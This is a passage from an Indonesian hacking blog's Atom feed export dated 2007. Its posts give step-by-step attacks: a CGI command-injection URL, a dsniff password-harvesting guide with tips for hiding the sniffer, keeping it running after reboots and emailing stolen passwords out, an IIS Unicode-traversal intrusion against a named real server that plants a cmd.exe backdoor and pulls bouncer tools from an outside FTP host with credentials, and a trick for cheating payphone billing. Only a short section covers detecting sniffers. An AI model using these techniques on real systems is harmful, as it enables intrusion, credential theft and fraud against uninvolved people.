penginstallan karen langkah 4 inilah langkah untuk menentukan login dan password admin nya.&lt;br /&gt;&lt;br /&gt;4. Lanjutkan step ke 5 untuk login admin.&lt;br /&gt;&lt;br /&gt;5. Selamat telah berhasil mengkudeta phpclassifieds, sekarang terserah kamu mau di apain :P~&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-4775779029006634103?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/4775779029006634103/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=4775779029006634103' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/4775779029006634103'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/4775779029006634103'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/kudeta.html' title='KUDETA'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-7428946722054816992</id><published>2007-03-31T04:08:00.000+07:00</published><updated>2007-03-31T04:10:25.039+07:00</updated><title type='text'>Pulsa Interlokal Jadi Pulsa Lokal</title><content type='html'>Mungkin juga ada sebagian pembaca yang udah mengetahuinya, n ma'af jika menurut anda saya mencontek artikel anda, sedikitpun tak ada niat saya mencontek artikel anda, ini murni hasil percobaan saya atas ketidak sengajaan dalam memencet tombol saat menelpon teman.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Catatan : &lt;br /&gt;NeRaKaCreW tidak bertanggung jawab baik secara langsung atau pun tidak atas akibat yang di timbulkan oleh artikel ini.&lt;br /&gt;&lt;br /&gt;Sebelumnya saya ingin mengatakan bahwa cara ini tidak berlaku untuk semua wartel. sebelumnya saya jg minta ma'af kepada bapak/ibu yang bekerja di Telkom n yang merasa di rugikan atas artikel ini, sekali lagi ma'af yang sebesar besarnya.&lt;br /&gt;&lt;br /&gt;Langsung saja.. Ada sebagian wartel yang sudah tidak bisa di "kerjain" dengan cara ini terutama wartel tipe - A&lt;br /&gt;cara ini pernah saya gunakan di wartel tipe - B dan Warter Mandiri ( empuk banget ).&lt;br /&gt;hampir seluruh wartel mandiri bisa dikatakan bisa. saya sudah mencoba beberapa Wartel dengan cara ini dan hasilnya lumayan banyak wartel yang masih bisa di kerjain. Ok!.. Mulai..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Anggap saja kita ingin menelpon ke nomor tujuan 0751-461***&lt;br /&gt;&lt;br /&gt;Caranya:&lt;br /&gt;&lt;br /&gt;1. Tekan terlebih dahulu nomor yang di tuju.&lt;br /&gt;2. Tekan tombol penutup.&lt;br /&gt;3. lalu tekan tombol radial.&lt;br /&gt;&lt;br /&gt;Loh di mana bedanya nih NeRaKa CreW kan sama aja?&lt;br /&gt;&lt;br /&gt;eit... tunggu dulu...&lt;br /&gt;&lt;br /&gt;Saat lo semua nekan Radial pakai lah sedikit Hormon Kewanitaan lo (perasaan yang sangat mendalam) usahakan saat nomor muncul kembali angka 0 dari nomor tujuan hilang. &lt;br /&gt;ex: no tujuan kita tadi 0751-461*** usakan yang keluar di layar nomor tujuan 751-461***&lt;br /&gt;&lt;br /&gt;kalo lo udah tekan radial ga' berhasil juga ngilangin angka 0 (nol/kosong) coba tekan lagi tombol penutup lalu ulangi lagi tekan radial ( kali ini pakai Hormon Ke Ibuan ) sampai angka 0 ilang dari layar.&lt;br /&gt;&lt;br /&gt;Gua udah coba nih NeRaKa CreW, tapi kok nga mau jg?&lt;br /&gt;&lt;br /&gt;gampang aja!... lo tinggal cari Wartel/Target lain ^_*&lt;br /&gt;&lt;br /&gt;NeRaKa CreW dari mana pengaruhnya ada angka 0 dengan tidak sama biaya yang di keluarin saat nelpon?&lt;br /&gt;&lt;br /&gt;hm.. Gini 0 ( berarti di luar daerah ) kalo kita menelpon... kalo nga salah istilah telkomnya interlokal ato apalah.. nga jelas soalnya saya bukan org telkom ^_*&lt;br /&gt;nah dengan menghilangkan 0 saat ingin menelpon sljj/sli/handphone maka kita tidak di kenai biaya interlokal. biaya yang terprint di wartel hannya jumlah biaya kita menelpon lokal.&lt;br /&gt;begitulah kira kira.&lt;br /&gt;&lt;br /&gt;Kalo kita telp dari telp rumah bisa nga?&lt;br /&gt;&lt;br /&gt;wah.. jalas nga bisa donk.. disini kan kita cuma menipu print-an wartel. jadi sebaiknya jangan coba coba di rumah..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-7428946722054816992?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/7428946722054816992/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=7428946722054816992' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7428946722054816992'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7428946722054816992'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/pulsa-interlokal-jadi-pulsa-lokal.html' title='Pulsa Interlokal Jadi Pulsa Lokal'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-7770258850582550128</id><published>2007-03-31T04:07:00.001+07:00</published><updated>2007-03-31T04:08:29.213+07:00</updated><title type='text'>New Desk CGI</title><content type='html'>lagi lagi cgi yang selalu mempunyai bolong yang banyak. satu lagi NewsDesk.cgi memiliki hole&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.domain.com/cgi-bin/newsdesk.cgi?a=latest&amp;t=info.html&lt;br /&gt;&lt;br /&gt;cgi-bin/newsdesk.cgi?a=latest&amp;t=|command| &lt;br /&gt;&lt;br /&gt;Selengkapnya&lt;br /&gt;&lt;br /&gt;http://www.domain.com/cgi-bin/newsdesk.cgi?a=latest&amp;t=|command|&lt;br /&gt;&lt;br /&gt;command adalah berisi perintah perintah linux seperti biasa&lt;br /&gt;misalnya : id , uname -a , ls -al dan lain lain&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-7770258850582550128?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/7770258850582550128/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=7770258850582550128' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7770258850582550128'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/7770258850582550128'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/blog-post.html' title='New Desk CGI'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-6568836959599785962</id><published>2007-03-31T04:04:00.001+07:00</published><updated>2007-03-31T04:04:57.382+07:00</updated><title type='text'>Panen Password</title><content type='html'>Baru mulai tertarik masalah keamanan? Pingin ngebuktiin ketidakamanan jaringan lokal kepada admin? Atas permintaan umum (dan seringnya teman-teman admin nanyain tentang sniffing), berikut adalah cara cepat (kurang lebih 15 sampai 30 menit) memanen password dengan menggunakan teknik yang sangat awam: ethernet sniffing. Tentunya akan dibahas juga cara-cara pendeteksian dan pemberantasannya.&lt;br /&gt;&lt;br /&gt;Komunikasi ethernet pada dasarnya adalah komunikasi tipe "siaran" (broadcast). Paket-paket ethernet dari mesin yang satu sebetulnya dilihat oleh setiap komputer yang tergabung dalam suatu jaringan lokal. Paket-paket ini dibuang jika alamat MAC-nya tidak cocok dengan alamat node tujuan. Nah, dengan menggunakan software-software 'network sniffer', paket-paket ethernet&lt;br /&gt;(beserta isinya) yang melewati kartu ethernet tertentu tidak dibuang begitu saja, melainkan dianalisa. Banyak kegunaan sniffing, tapi di artikel ini penulis hanya membahas sniffing password dengan menggunakan program paten karangan Dug Song (www.monkey.org/~dugsong) dsniff.&lt;br /&gt;&lt;br /&gt;dsniff aslinya adalah software Unix, dan teman-teman yang punya Linux/BSD bisa langsung ngedownload dan compile dsniff dari http://www.monkey.org/~dugsong/dsniff). Artikel ini membahas penggunaan di jaringan lokal berbasis Windows, sebab artikel ini ditujukan untuk pemula, dan mereka-mereka yang pingin memanen password tapi nggak punya akses ke Unix. Program dsniff ini punya spesialisasi menggarap password dari berbagai protokol, dan memformat hasil panenan dalam bentuk yang mudah dibaca. Protokol yang bisa ditangani oleh dsniff antara lain adalah FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB,&lt;br /&gt;dan Oracle SQL*Net auth info.&lt;br /&gt;&lt;br /&gt;Penggunaan dsniff tidak begitu jauh berbeda antara versi Win32 dengan versi Unix-nya. Kelebihan yang bias dinikmati pengguna Unix saat ini adalah adanya dua program tambahan di dsniff yang membuat dsniff versi Unix lebih perkasa, mampu memanen password dari jaringan berbasis "ethernet switch" atau "active hub", jadi tidak terbatas ke jaringan "hub" saja.&lt;br /&gt;&lt;br /&gt;Bahan-bahan/Persyaratan:&lt;br /&gt;--------------------------------&lt;br /&gt;LAN lokal untuk target, yang terhubung dengan menggunakan "ethernet hub" (bukan switch)&lt;br /&gt;- mesin Windows 95, 98 atau ME (untuk 2000 dan XP, kamu mesti punya hak administrator di   mesin yg akan digunakan untuk memanen) yang terhubung ke LAN target&lt;br /&gt;- WinPCap library, download dari http://netgroup-serv.polito.it/winpcap/install/bin/WinPcap.exe&lt;br /&gt;- dsniff port to Win32, download dari   http://www.datanerds.net/~mike/binaries/dsniff-1.8-win32-static.tgz (gunakan WinZip untuk   nge-extract file-file .exe-nya)&lt;br /&gt;&lt;br /&gt;Cara Memasak&lt;br /&gt;------------------&lt;br /&gt;&lt;br /&gt;- Install WinPcap library. Doubleclick winpcap.exe dan ikuti petunjuk di layar (tinggal pencet   "Next","Next","Finish")&lt;br /&gt;- Extract file dsniff...tgz nya ke suatu directory (sebaiknya di bawah&lt;br /&gt;  C:\Windows atau tempat lain yang nggak terlalu mencurigakan - untuk artikel ini, anggap saja   disimpan di C:\WINDOWS\DS)&lt;br /&gt;- Mulai memanen password. Dari start menu, klik "Run", ketik "command". Pindah ke direktori   tempat disimpannya dsniff ("cd \windows\ds"). dari prompt C:&gt; tinggal ketik "dsniff".&lt;br /&gt;- silakan menonton password-password milik pengguna ditampilkan di layar&lt;br /&gt;&lt;br /&gt;Catatan:&lt;br /&gt;----------&lt;br /&gt;Ada kemungkinan anda harus menspesifikasikan kartu ethernet mana yang ingin disadap. Untuk melihat daftar-daftar interface yang tersedia, ketik "dsniff -D" dari prompt DOS. Anda akan melihat daftar interface yang tersedia. Jika secara default dsniff mencoba menyadap interface yang salah, gunakan "dsniff -i [ketik nama interface disini]".&lt;br /&gt;&lt;br /&gt;Pengembangan lebih lanjut&lt;br /&gt;---------------------------------&lt;br /&gt;&lt;br /&gt;Untuk menyimpan daftar password yang terpanen ke sebuah file, tambahkan perintah "-w [namafile]" ke program dsniff. Contoh: "c:\WINDOWS\DS&gt;dsniff -i ELNK3 -w password.db"&lt;br /&gt;untuk membaca file yg dibuat dsniff, berikan perintah "-r [namafile]"&lt;br /&gt;contoh: "C:\WINDOWS\DS&gt;dsniff -r password.db"&lt;br /&gt;secara opsional, jika anda ingin file hasil panen ini disimpan dalam bentuk file ASCII:&lt;br /&gt;"C:\WINDOWS\DS&gt;dsniff -r password.db &gt; panen.txt",&lt;br /&gt;&lt;br /&gt;panen.txt siap disajikan.&lt;br /&gt;&lt;br /&gt;Yang lebih asyik lagi, bisa kita konfigurasikan agar usaha panen kita tetap berjalan walaupun komputer tersebut di-reboot.Caranya gampang. Mula-mula download dulu program "start minimized" (sm.exe) dari http://www.ethernal.org/List-Archives/curves-kiddies-0010/msg00029.html.&lt;br /&gt;Simpan program ini di C:\WINDOWS. Kemudian kita bikin batch file yang bisa dijalankan dari command prompt. Gunakan Notepad atau "edit" untuk membuat file ini, dan sebagai isi:&lt;br /&gt;@echo off&lt;br /&gt;sm /hidden c:\windows\ds\dsniff.exe -w &gt; password.db&lt;br /&gt;&lt;br /&gt;(tambahkan perintah opsional seperti "-i ELNK3" jika perlu)&lt;br /&gt;&lt;br /&gt;Nah, simpan file ini (sebagai "ds.bat", misalnya), dan pindahkan file ini ke folder "Startup" lewat Start menu supaya tiap kali komputer di-restart, program dsniff kita dijalankan juga, siap untuk memanen. Program "sm" diatas berfungsi menjalankan program secara tersembunyi supaya tidak mencurigakan. Tentu saja, biar lebih nggak mencurigakan lagi, rubah nama dsniff.exe ke nama lain, dan jangan lupa ngeganti perintah "dsniff" dengan nama yang baru di semua command dan batch file. Sekarang anda bisa tinggalkan komputer tersebut, dan dikemudian waktu kembali lagi untuk memeriksa sejauh mana hasil sadapan anda bekerja&lt;br /&gt;(dengan perintah "dsniff -r password.db &gt; panen.txt" lalu "notepad panen.txt").&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Membuat sadapan lebh portabel&lt;br /&gt;-----------------------------&lt;br /&gt;Untuk membuat disket dsniff, file-file yang anda perlukan adalah: dsniff.exe&lt;br /&gt;wpcap.dll (cari di C:\WINDOWS\SYSTEM atau C:\WINDOWS\SYSTEM32 untuk Win2K/XP)&lt;br /&gt;wpcap.vxd packet.dll&lt;br /&gt;simpan file-file ini ke disket (A:), dan tinggal dibawa disketnya ke LAN target. Penjalanan perintah masih tetap sama seperti diatas, kecuali lokasi prompt nya bukan di :\WINDOWS\DS&gt;, melainkan di A:\&gt;.&lt;br /&gt;Jika anda butuh tantangan tambahan, gunakan perintah "at" dan program pengirim email blat.exe" untuk mengirimkan hasil panenan ke alamat e-mail anonimus anda setiap jam atau bahkan setiap 5 menit. Jangan lupa bagi-bagi hasil :).&lt;br /&gt;&lt;br /&gt;Tambahan-tambahan&lt;br /&gt;-----------------&lt;br /&gt;Port dsniff-win32 juga mengandung beberapa utility ekstra, seperti mailsnarf (untuk membaca lalu lintas e-mail di jaringan lokal), urlsnarf (untuk membaca alamat-alamat website yang dikunjungi pengguna LAN sekitar anda), dan webspy (untuk menguntit jejak surfing mesin tertentu). Silaka anda coba main-main dengan utiliti-utiliti ini, penulis yakin akan ada gunanya.Harap diingat bahwa teknik diatas hanya mempan untuk LAN yang terhubung melalui "ethernet hub". Jika kebetulan LAN anda menggunakan "ethernet switch", bukan berarti nggak ada harapan. Pengguna versi Unix-nya dsniff bisa cengar-cengir, sebab paket dsniff versi Unix mengandung dua program&lt;br /&gt;tambahan: arpspoof (untuk 'menipu' mesin-mesin lain agar mengirimkan paket ke mesin anda) dan macof (untuk membanjiri "switch" lokal dengan alamat-alamat MAC acak, biasanya berakibat "ethernet switch" yang ditargetkan menjadi bingung dan mengubah mode menjadi default, bertingkah laku seperti "ethernet hub").&lt;br /&gt;&lt;br /&gt;Deteksi, Pencegahan, dan Penanggulangan&lt;br /&gt;---------------------------------------&lt;br /&gt;Sebagai admin, anda bisa mendeteksi kartu-kartu ethernet di LAN anda yang menjalankan dsniff (dan progarm-program sejenis dsniff) karena secara prinsip, untuk meng-capture paket-paket, interface ybs harus berada dalam mode "promiscous". Jadwalkan program-program ini untuk berjalan setiap 5 menit, dan konfigurasikan agar komputer pendeteksi mengemail anda jika ada&lt;br /&gt;aktifitas-aktifitas mencurigakan. Utiliti yang bisa anda gunakan termasuk "promisc", "CPM", "ifstatus", atau yang lebih yahud lagi, utilitas buatan grup hacking Portugal The Apostols yang bernama "NePED" (http://metalab.unc.edu/pub/Linux/distributions/trinux/src/neped.c). Untuk&lt;br /&gt;platform Windows, tersedia produk-produk komersil seperti LANGuard/LANSniffer atau AntiSniff dari L0pht Heavy Industry (http://www.l0pht.com/antisniff). Diantara produk-produk diatas, sebagian besar hanyalah bisa mendeteksi adanya sniffer jika dijalankan di mesin lokal. Untuk mendeteksi network secara remote, gunakan NePED atau AntiSniff.&lt;br /&gt;&lt;br /&gt;Jika anda punya budget, beli switch ethernet yang nggak nge-default ke "hub mode" kalau di-flood alamat-alamat MAC palsu. Kalau anda nggak ngerti, harap ngambil kursus "Pengenalan TCP/IP" atau berhenti jadi admin. Juga harap ingat bahwa banyak perusahaan-perusahaan yang mengklaim menjual hub yang tak bisa disadap, tapi ternyata hanya menjual hub tipe "active huub" yang biasanya tidak bisa menghandel traffic Fast Ethernet (100 Mbps).&lt;br /&gt;&lt;br /&gt;Cara paling handal untuk mencegah bocornya informasi sensitif lewat network adalah dengan menggunakan enkripsi. Pakailah SSH, SCP (pengganti FTP) atau SFTP, TLS (untuk memeriksa e-mail), SSL dan HTTPS (untuk transaksi web), tunelling, dll. Usahakan agar jangan sampai ada program yang mengirimkan password tanpa enkripsi melalui jaringan yang anda kelola. Juga selalu&lt;br /&gt;periksa keadaan hard disk anda. Seringkali sniffer-sniffer meninggalkan jejak berupa file hasil panenan yang berukuran besar (apalagi jika LANnya sibuk).&lt;br /&gt; Cara lain mengamankan network anda adalah dengan memindahkan topologi jaringan anda ke sistem token ring, _dan_ menggunakan kartu-kartu ethernet Token-Ring buatan IBM (iklan sabun colexz). Tapi tentunya metode ini tidaklah praktis bagi anda yang ingin tetap menggunakan topologi star atau hybrid&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-6568836959599785962?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/6568836959599785962/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=6568836959599785962' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/6568836959599785962'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/6568836959599785962'/><link rel='alternate' type='text/html' href='http://carahacking.blogspot.com/2007/03/panen-password.html' title='Panen Password'/><author><name>Sri Maryati Pratiwi</name><uri>http://www.blogger.com/profile/08229341449358449348</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1331045226915696546.post-6110645373663604211</id><published>2007-03-31T04:01:00.000+07:00</published><updated>2007-03-31T04:03:32.938+07:00</updated><title type='text'>Pasang Bouncer</title><content type='html'>Tutor ini hanya untuk tujuan mencerdaskan anak bangsa, segala resiko yg terjadi bukan tanggung&lt;br /&gt;jawab penulis. Dan penulis asumsikan saudara udah mengerti benar ttg bug yg dah lama ini&lt;br /&gt;(Unicode), sebenarnya masih bnyak cara lain  selain memanfaatkan bug Unicode pada server IIS.&lt;br /&gt;&lt;br /&gt;..:: TOOLZ ::..&lt;br /&gt;&lt;br /&gt;- Pertama-pertama siapkan rokok, makanan yg secukupnya kalo bisa ce cakep huaaa ini pembawa&lt;br /&gt;   inspirasi &lt;br /&gt;- IIS Scanner ( Untuk mencari Hole Pada Web Server yg mungkin Vulrnerable ), gw biasanya        pake cgi/iis scanner 4.0 - IIS Scanner 2002 by schiczho Thx for tools, IISTESO.C ini juga    nice bgt.&lt;br /&gt;- List dari web target paling cepat cari di msn.net keyword " IIS 4.0 Server" hehe disana&lt;br /&gt;   gudangnya.&lt;br /&gt;- PSKILL.EXE ( Untuk KILL Proses di OS Windows), PSLIST.EXE (Untuk Proses List yg sedang    jalan)&lt;br /&gt;- BNC.EXE dan BNC.CFG sendiri untuk file bouncernya sendiri. File ini bisa didapatkan pada&lt;br /&gt;   server ftp yg emang gw sengaja upload untuk dipakai bersama. PERHATIAN!!! Bagi tangan jahil&lt;br /&gt;   aku harap username dan password pada server ftp yg gw masukin pada tutor ini jangan diganti&lt;br /&gt;   biar kita semua bisa pake.  gw percaya ama kalian semua.&lt;br /&gt;&lt;br /&gt;..:: LANGKAH-LANGKAH ::..&lt;br /&gt;&lt;br /&gt;- Setelah anda mendapatkan targetnya misalnya "http://www.hefele.sulinet.hu" scan dulu       targetnya untuk mencari unicode yg kira-kira bisa dipakai untuk mengupload file nya.&lt;br /&gt;- Dari hasil scan target tadi saya dapatkan bug berikut :&lt;br /&gt;   "http://www.hefele.sulinet.hu/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\"&lt;br /&gt;&lt;br /&gt;Tapi untuk memperpendek bug nya atau kata lain kita buat backdoor untuk antisipasi, copiin&lt;br /&gt;file cmd.exe ke folder yg kira² bisa dibuka lewat komputer luar. Dari sekian folder yg bisa&lt;br /&gt;diakses ada tiga folder yg benar² enak and mantabz bo untuk dipasangin backdoor yakni :&lt;br /&gt;&lt;br /&gt;../scripts &lt;== biasanya di C:\Inetpub\Scripts\&lt;br /&gt;../MSADC &lt;== biasanya di C:\Progra~1\Common~1\System\MSADC\&lt;br /&gt;../iisadmpwd &lt;== biasanya di C:\Winnt\System32\Inetsrv\iisadmpwd\&lt;br /&gt;&lt;br /&gt;Anda bisa memilih salah satu dari ketiga folder tersebut untuk memasang backdoor untuk&lt;br /&gt;melanjutkan misi kita. Ok kita pilih folder scripts aja karena pathnya paling pendek, pada&lt;br /&gt;browser ketikkan ini :&lt;br /&gt;&lt;br /&gt;"http://www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\admin.exe"&lt;br /&gt;&lt;br /&gt;sekarang kita punya backdoor untuk akses isi servernya yakni :&lt;br /&gt;&lt;br /&gt;"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+dir+c:\"&lt;br /&gt;&lt;br /&gt;Dari link ini kita lanjutin misi kita, copiin file ftp.exe ke folder scripts juga untuk&lt;br /&gt;mengupload file bnc kita ntar. Santai Dulz gw sambilan menghayal nih hehehe kapan ya kuliah&lt;br /&gt;gw selesai hikz cedih deh gw.... &lt;br /&gt;caranya sama kayak copy cmd.exe tadi kayak dibawah ini dudulz ah &lt;br /&gt;&lt;br /&gt;"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+copy+c:\winnt\system32\ftp.exe+c:\inetpub\scripts\"&lt;br /&gt;&lt;br /&gt;Setelah itu buat script dibawah ini dengan command echo.. scriptnya kayak ini :&lt;br /&gt;&lt;br /&gt;echo+open+209.202.197.150&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+bncfile&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+masukaja&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+bin&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+cd+bnc&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+get+bnc.exe&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+get+PSLIST.EXE&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+get+PSKILL.EXE&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+ascii&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+get+bnc.cfg&gt;&gt;+c:\ftp.txt&lt;br /&gt;echo+bye&gt;&gt;+c:\ftp.txt&lt;br /&gt;&lt;br /&gt;Gw anggap semua dah tau cara buat scriptnya dengan command echo, kalo belum au ah gelapzzz...&lt;br /&gt;setelah script nya jadi pastiin dulu isi scriptsnya benar,dengan command type seperti dibawah ini :&lt;br /&gt;&lt;br /&gt;"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+type+c:\ftp.txt"&lt;br /&gt;&lt;br /&gt;pastiin isi script nya seperti ini&lt;br /&gt;&lt;br /&gt;open 209.202.197.150&lt;br /&gt;bncfile&lt;br /&gt;masukaja&lt;br /&gt;bin&lt;br /&gt;cd bnc&lt;br /&gt;get bnc.exe&lt;br /&gt;get PSLIST.EXE&lt;br /&gt;get PSKILL.EXE&lt;br /&gt;ascii&lt;br /&gt;get bnc.cfg&lt;br /&gt;bye&lt;br /&gt;&lt;br /&gt;Kalo isi scriptnya udah seperti diatas, kita bisa menjalankan scriptnya dengan command brkt :&lt;br /&gt;&lt;br /&gt;"http://www.hefele.sulinet.hu/scripts/ftp.exe?-s:c:\ftp.txt"&lt;br /&gt;&lt;br /&gt;Clink... file bnc kita berikut tools nya udah ada di "C:\Inetpub\Scripts\" Kalo gak percaya&lt;br /&gt;liat aja sendiri pake command dir (semuanya command DOS murni kok) gini loh dulz :&lt;br /&gt;&lt;br /&gt;"http://www.hefele.sulinet.hu/scripts/admin.exe?/c+dir"&lt;br /&gt;&lt;br /&gt;Kalo file nya dah ada, bnc nya cukup kita jalanin lewat browser kayak gini :&lt;br /&gt;&lt;br /&gt;"http://www.hefele.sulinet.hu/scripts/bnc.exe"&lt;br /&gt;&lt;br /&gt;Biasanya akan keluar keterangan bahwa bnc nya dah aktif, tapi untuk lebih memastikan bahwa&lt;br /&gt;BNC kamu jalan pake tools PSLIST untuk melihat prosesnya &lt;br /&gt;&lt;br /&gt;"http://www.hefele.sulinet.hu/scripts/PSLIST.EXE"&lt;br /&gt;&lt;br /&gt;akan tampil seperti ini :&lt;br /&gt;&lt;br /&gt;Process information for SZERVER:&lt;br /&gt;&lt;br /&gt;Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time&lt;br /&gt;Idle 0 0 1 0 16 0:00:00.000 661:34:23.153 0:00:00.000&lt;br /&gt;System 2 8 85 2610 1032 0:00:00.000 0:07:48.313 0:00:00.000&lt;br /&gt;SMSS 25 11 6 30 0 0:00:00.090 0:00:00.070 667:57:32.790&lt;br /&gt;CSRSS 33 13 7 636 1016 0:00:01.682 0:00:01.442 667:57:27.052&lt;br /&gt;..&lt;br /&gt;..&lt;br /&gt;..&lt;br /&gt;VbCons 621 8 18 212 2596 0:00:00.871 0:00:01.131 87:48:53.868&lt;br /&gt;BNC 501 8 1 260 1216 0:00:00.010 0:00:00.010 0:08:56.261&lt;br /&gt;PSLIST 418 8 1 299 1884 0:00:00.040 0:00:00.110 0:00:00.150&lt;br /&gt;&lt;br /&gt;Disitu kamu bisa ngeliat BNC kamu aktif dengan nomor PID 501 , jika suatu waktu bncnya&lt;br /&gt;crash kamu bisa kill prosesnya dengan command :&lt;br /&gt;&lt;br /&gt;"http://www.hefele.sulinet.hu/scripts/PSKILL.EXE?+501" &lt;-- syntax nya PSKILL?+PID&lt;br /&gt;&lt;br /&gt;Untuk Lebih memastikan bnc kamu aktif dan sehat kamu coba aja connect ke web server nya&lt;br /&gt;dengan mIRC atau program chat lain, misalnya pake mIRC :&lt;br /&gt;&lt;br /&gt;"/server www.hefele.sulinet.hu 5050"&lt;br /&gt;[09:06] * Connecting to www.hefele.sulinet.hu (5050)&lt;br /&gt;[09:06] -www.hefele.sulinet.hu- You need to say /quote PASS&lt;br /&gt;"/quote pass admin"&lt;br /&gt;[09:07] -&gt; Server: pass admin&lt;br /&gt;[09:07] -www.hefele.sulinet.hu- Welcome to BNC 2.6.4-WIN, the irc proxy&lt;br /&gt;[09:07] -www.hefele.sulinet.hu- Level two, lets connect to something real now&lt;br /&gt;[09:07] -www.hefele.sulinet.hu- type /quote conn [server] to connect&lt;br /&gt;[09:07] -www.hefele.sulinet.hu- type /quote help for basic list of commands and usage&lt;br /&gt;"/quote conn tiscali.uk.eu.dal.net 8888"&lt;br /&gt;[09:08] -&gt; Server: conn tiscali.uk.eu.dal.net 8888&lt;br /&gt;[09:08] -www.hefele.sulinet.hu- Making reality through tiscali.uk.eu.dal.net port 8888&lt;br /&gt;[09:08] -www.hefele.sulinet.hu- Suceeded connection&lt;br /&gt;&lt;br /&gt;Cleng..... elo dah connect ke server irc dengan IP web server yg elo pasangin BNC. &lt;br /&gt;Ok deh.. cuman segini kok tutor dudulz ini, kalo yg udah bisa jgn ngolok ya  ajarin dong&lt;br /&gt;yg lain ilmu jangan disimpan sendiri ntar mabok elo... mabok ilmu emang enak xixixi.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1331045226915696546-6110645373663604211?l=carahacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://carahacking.blogspot.com/feeds/6110645373663604211/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1331045226915696546&amp;postID=6110645373663604211' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1331045226915696546/posts/default/6110645373663604211'/><link rel='self' type='application/atom+xml' 